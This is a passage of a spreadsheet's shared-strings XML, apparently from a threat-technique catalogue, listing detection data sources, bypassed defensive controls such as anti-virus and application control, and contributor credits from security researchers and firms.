    <t>Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification, Command: Command Execution, Driver: Driver Load, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Process: Process Creation, Process: Process Termination, Script: Script Execution, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Process: Process Creation, Script: Script Execution, Sensor Health: Host Status, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Firewall: Firewall Disable, Firewall: Firewall Rule Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Driver: Driver Load, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Image: Image Creation, Image: Image Metadata, Image: Image Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Firewall: Firewall Rule Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Modification, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, Process: OS API Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Driver: Driver Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>File: File Modification</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Access, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Process: Process Access</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Named Pipe: Named Pipe Metadata, Network Share: Network Share Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>File: File Creation, File: File Metadata</t>
  </si>
  <si>
    <t>File: File Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>File: File Metadata, Image: Image Metadata, Process: Process Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Metadata</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Application Log: Application Log Content, File: File Creation, File: File Modification, Logon Session: Logon Session Creation, Module: Module Load, Process: OS API Execution, Process: Process Access, User Account: User Account Authentication, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>File: File Modification, Logon Session: Logon Session Creation, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Modification, Logon Session: Logon Session Creation, Module: Module Load</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Logon Session: Logon Session Creation, User Account: User Account Authentication, User Account: User Account Modification</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>File: File Modification, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, Script: Script Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Instance: Instance Creation, Instance: Instance Deletion, Instance: Instance Metadata, Instance: Instance Modification, Instance: Instance Start, Instance: Instance Stop, Snapshot: Snapshot Creation, Snapshot: Snapshot Deletion, Snapshot: Snapshot Metadata, Snapshot: Snapshot Modification, Volume: Volume Creation, Volume: Volume Deletion, Volume: Volume Metadata, Volume: Volume Modification</t>
  </si>
  <si>
    <t>Instance: Instance Creation, Instance: Instance Metadata</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Creation, Snapshot: Snapshot Metadata</t>
  </si>
  <si>
    <t>Instance: Instance Deletion, Instance: Instance Metadata</t>
  </si>
  <si>
    <t>Instance: Instance Metadata, Instance: Instance Modification, Instance: Instance Start, Instance: Instance Stop</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration, Command: Command Execution, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Command: Command Execution, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>File: File Metadata, Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>File: File Creation</t>
  </si>
  <si>
    <t>Certificate: Certificate Registration, Internet Scan: Response Content, Malware Repository: Malware Content, Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>Certificate: Certificate Registration, Internet Scan: Response Content</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Group: Group Enumeration, Group: Group Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Group: Group Enumeration, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Modification, Driver: Driver Metadata, Firmware: Firmware Modification, Network Traffic: Network Connection Creation, Process: OS API Execution</t>
  </si>
  <si>
    <t>Drive: Drive Modification</t>
  </si>
  <si>
    <t>Driver: Driver Metadata, Firmware: Firmware Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, Firmware: Firmware Modification, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Access, Process: Process Modification</t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Modification</t>
  </si>
  <si>
    <t>File: File Metadata, Process: OS API Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution, Script: Script Execution</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Module: Module Load, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Network Traffic: Network Traffic Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>Container: Container Creation, File: File Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>File: File Access, Process: Process Access</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Active Directory: Active Directory Object Modification, Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Command: Command Execution, File: File Access, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>File: File Modification, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>File: File Metadata, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Module: Module Load, Network Traffic: Network Connection Creation, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Creation, Cloud Storage: Cloud Storage Metadata, Cloud Storage: Cloud Storage Modification, Network Traffic: Network Traffic Content, Snapshot: Snapshot Creation, Snapshot: Snapshot Metadata, Snapshot: Snapshot Modification</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Command: Command Execution, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Application Log: Application Log Content, Logon Session: Logon Session Creation, User Account: User Account Authentication, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, File: File Creation, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start</t>
  </si>
  <si>
    <t>File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Windows User Account Control</t>
  </si>
  <si>
    <t>Heuristic Detection, Host Forensic Analysis, System Access Controls, Windows User Account Control</t>
  </si>
  <si>
    <t>File system access controls, System access controls, Windows User Account Control</t>
  </si>
  <si>
    <t>Heuristic Detection, Host Forensic Analysis</t>
  </si>
  <si>
    <t>Firewall, Host forensic analysis</t>
  </si>
  <si>
    <t>Anti-virus, Host Intrusion Prevention Systems, Network Intrusion Detection System, Signature-based Detection</t>
  </si>
  <si>
    <t>File monitoring, File system access controls</t>
  </si>
  <si>
    <t>File system access controls, System access controls</t>
  </si>
  <si>
    <t>Anti-virus, Host Forensic Analysis, Signature-based Detection, Static File Analysis</t>
  </si>
  <si>
    <t>Anti-virus, System access controls</t>
  </si>
  <si>
    <t>File system access controls</t>
  </si>
  <si>
    <t>Host forensic analysis</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection</t>
  </si>
  <si>
    <t>Gatekeeper, Notarization</t>
  </si>
  <si>
    <t>Anti-virus, Application Control</t>
  </si>
  <si>
    <t>Application Control</t>
  </si>
  <si>
    <t>Anti-virus, Digital Certificate Validation, File monitoring, Firewall, Host forensic analysis, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>Log analysis</t>
  </si>
  <si>
    <t>Firewall</t>
  </si>
  <si>
    <t>Anti-virus, File monitoring, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>Host forensic analysis, Log analysis</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>Anti-virus, Host Intrusion Prevention Systems</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Log analysis</t>
  </si>
  <si>
    <t>Anti Virus, Host Intrusion Prevention Systems, Log Analysis</t>
  </si>
  <si>
    <t>Application Control, Static File Analysis</t>
  </si>
  <si>
    <t>Multi-Factor Authentication</t>
  </si>
  <si>
    <t>Firewall, System Access Controls</t>
  </si>
  <si>
    <t>Application Control, Host Forensic Analysis, Host Intrusion Prevention Systems, Log Analysis, Signature-based Detection</t>
  </si>
  <si>
    <t>Anti-virus, Signature-based detection</t>
  </si>
  <si>
    <t>Anti-virus, Binary Analysis, Host intrusion prevention systems, Signature-based detection, Static File Analysis</t>
  </si>
  <si>
    <t>Anti-virus, Static File Analysis, Web Content Filters</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>Anti-virus, Heuristic detection, Signature-based detection</t>
  </si>
  <si>
    <t>Anti-virus, File monitoring, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>Anti-virus, Application control</t>
  </si>
  <si>
    <t>Anti-virus, Application Control, File Monitoring, Host Intrusion Prevention Systems, Signature-based Detection, System Access Controls</t>
  </si>
  <si>
    <t>Anti-virus, Application Control, Autoruns Analysis, Digital Certificate Validation, User Mode Signature Validation, Windows User Account Control</t>
  </si>
  <si>
    <t>Application Control, Digital Certificate Validation, User Mode Signature Validation</t>
  </si>
  <si>
    <t>Digital Certificate Validation</t>
  </si>
  <si>
    <t>Application Control, Autoruns Analysis, Digital Certificate Validation, User Mode Signature Validation</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>Application control</t>
  </si>
  <si>
    <t>Application Control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>Static File Analysis</t>
  </si>
  <si>
    <t>Defensive network service scanning</t>
  </si>
  <si>
    <t>System Access Controls</t>
  </si>
  <si>
    <t>Anti-virus, Application Control, Firewall, Host Intrusion Prevention Systems, Network Intrusion Detection System, System Access Controls</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection, Static File Analysis</t>
  </si>
  <si>
    <t>Encryption</t>
  </si>
  <si>
    <t>Anti-virus, Application Control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>Casey Smith; Stefan Kanthak</t>
  </si>
  <si>
    <t>Erika Noerenberg, @gutterchurl, Carbon Black; Jimmy Astle, @AstleJimmy, Carbon Black</t>
  </si>
  <si>
    <t>Jared Atkinson, @jaredcatkinson; Robby Winchester, @robwinchester3; Tom Ueltschi @c_APT_ure; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Vadim Khrykov</t>
  </si>
  <si>
    <t>Wayne Silva, F-Secure Countercept</t>
  </si>
  <si>
    <t>Alain Homewood, Insomnia Security; Vincent Le Toux</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic; Microsoft Threat Intelligence Center (MSTIC); Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Praetorian</t>
  </si>
  <si>
    <t>ExtraHop; Miriam Wiesner, @miriamxyra, Microsoft Security</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic; Miriam Wiesner, @miriamxyra, Microsoft Security</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Praetorian; Tim MalcomVetter; Wojciech Lesicki</t>
  </si>
  <si>
    <t>Alex Soler, AttackIQ; Expel; Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Oleg Kolesnikov, Securonix; Zur Ulianitzky, XM Cyber</t>
  </si>
  <si>
    <t>Alex Parsons, Crowdstrike; Alex Soler, AttackIQ; Chris Romano, Crowdstrike; Clément Notin, Tenable; Microsoft Threat Intelligence Center (MSTIC); Pià Consigny, Tenable; Praetorian; Wojciech Lesicki</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Microsoft Detection and Response Team (DART); Mike Burns, Mandiant; Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)</t>
  </si>
  <si>
    <t>Mike Moran; Pawel Partyka, Microsoft 365 Defender</t>
  </si>
  <si>
    <t>Dror Alon, Palo Alto Networks; Or Kliger, Palo Alto Networks; Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>Deloitte Threat Library Team; Menachem Goldstein; Oleg Kolesnikov, Securonix; Vinayak Wadhwa, Lucideus; Wes Hurd</t>
  </si>
  <si>
    <t>Awake Security</t>
  </si>
  <si>
    <t>Elvis Veliz, Citi; Jan Petrov, Citi; Richard Julian, Citi</t>
  </si>
  <si>
    <t>Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project; Mayuresh Dani, Qualys; NEC</t>
  </si>
  <si>
    <t>Jon Sternstein, Stern Security</t>
  </si>
  <si>
    <t>Alex Spivakovsky, Pentera; Andrew Allen, @whitehat_zero</t>
  </si>
  <si>
    <t>Andrew Allen, @whitehat_zero; Eric Kuehn, Secure Ideas; Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>Chris Heald; Jan Petrov, Citi</t>
  </si>
  <si>
    <t>Mayan Arora aka Mayan Mohan</t>
  </si>
  <si>
    <t>ExtraHop</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic; Red Canary; Ricardo Dias</t>
  </si>
  <si>
    <t>Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)</t>
  </si>
  <si>
    <t>Anastasios Pingios; Eric Kaiser @ideologysec; Jeremy Galloway; Red Canary; Wayne Silva, F-Secure Countercept</t>
  </si>
  <si>
    <t>Vincent Le Toux</t>
  </si>
  <si>
    <t>Stefan Kanthak; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Mathieu Tartare, ESET</t>
  </si>
  <si>
    <t>Dray Agha, @Purp1eW0lf, Huntress Labs; Oddvar Moe, @oddvarmoe</t>
  </si>
  <si>
    <t>Bobby, Filar, Elastic; David French, Elastic; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Scott Lundgren, @5twenty9, Carbon Black</t>
  </si>
  <si>
    <t>Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>Mike Kemmerer</t>
  </si>
  <si>
    <t>Chris Ross @xorrior; Justin Warner, ICEBRG</t>
  </si>
  <si>
    <t>Justin Warner, ICEBRG</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Ed Williams, Trustwave, SpiderLabs; Magno Logan, @magnologan, Trend Micro; Mohamed Kmal; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Anastasios Pingios; Diogo Fernandes</t>
  </si>
  <si>
    <t>Mohamed Kmal</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC); Mohamed Kmal</t>
  </si>
  <si>
    <t>John Strand; Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security; Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security; Roi Kol, @roykol1, Team Nautilus Aqua Security; Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>Isif Ibrahima, Mandiant; Praetorian; Regina Elwell</t>
  </si>
  <si>
    <t>Praetorian; Suzy Schapperle - Microsoft Azure Red Team</t>
  </si>
  <si>
    <t>Isif Ibrahima, Mandiant; Regina Elwell</t>
  </si>
  <si>
    <t>Phil Stokes, SentinelOne</t>
  </si>
  <si>
    <t>Cody Thomas, SpecterOps</t>
  </si>
  <si>
    <t>Mayuresh Dani, Qualys; Praetorian</t>
  </si>
  <si>
    <t>Francesco Bigarella</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch</t>
  </si>
  <si>
    <t>Jeremy Galloway</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Brad Geesaman, @bradgeesaman; Center for Threat-Informed Defense (CTID); David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC); Praetorian</t>
  </si>
  <si>
    <t>Antonio Piazza, @antman1p</t>
  </si>
  <si>
    <t>Akshat Pradhan, Qualys; Matthew Demaske, Adaptforward; Mayuresh Dani, Qualys; Pedro Harrison; Wietze Beukema, @wietze</t>
  </si>
  <si>
    <t>Barry Shteiman, Exabeam; RedHuntLabs, @redhuntlabs; Ryan Benson, Exabeam; Sylvain Gil, Exabeam</t>
  </si>
  <si>
    <t>Matt Burrough, @mattburrough, Microsoft</t>
  </si>
  <si>
    <t>Bernaldo Penas Antelo; Mugdha Peter Bansode; Uriel Kosayev; Vadim Khrykov</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee; Syed Ummar Farooqh, McAfee; Varonis Threat Labs</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach</t>
  </si>
  <si>
    <t>ExtraHop; Harshal Tupsamudre, Qualys; Mayuresh Dani, Qualys; Oleg Kolesnikov, Securonix; Travis Smith, Qualys</t>
  </si>
  <si>
    <t>Praetorian; Shane Tully, @securitygypsy</t>
  </si>
  <si>
    <t>Massimiliano Romano, BT Security</t>
  </si>
